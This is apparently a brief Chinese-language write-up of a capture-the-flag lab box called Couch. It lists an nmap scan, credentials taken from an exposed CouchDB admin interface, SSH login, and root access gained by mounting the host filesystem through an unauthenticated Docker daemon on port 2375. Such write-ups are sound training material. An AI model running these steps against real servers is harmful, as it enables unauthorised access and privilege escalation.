Couch
入侵以基于 JSON 的文档格式收集和存储数据的易受攻击的数据库服务器.
做点简单题放松放松
端口扫描
循例 nmap 扫:
nmap -sV 10.10.83.34 -p 1-10000 -T5
CouchDB
百度找couchdb相关文章:
访问/_utils
在secret中发现了一组凭据
利用这组凭据尝试登录ssh
Docker 守护程序
在atena的家目录下发现发现.bash_history文件有东西:
使用ss命令查看到内网确实开了2375,通过bash_history我们可以确定这是docker daemon
Docker利用
docker -H 127.0.0.1:2375 images
发现一个alpine
docker -H 127.0.0.1:2375 run -v /:/tmp -it alpine
挂载主机根,root.txt在/tmp/root/root.txt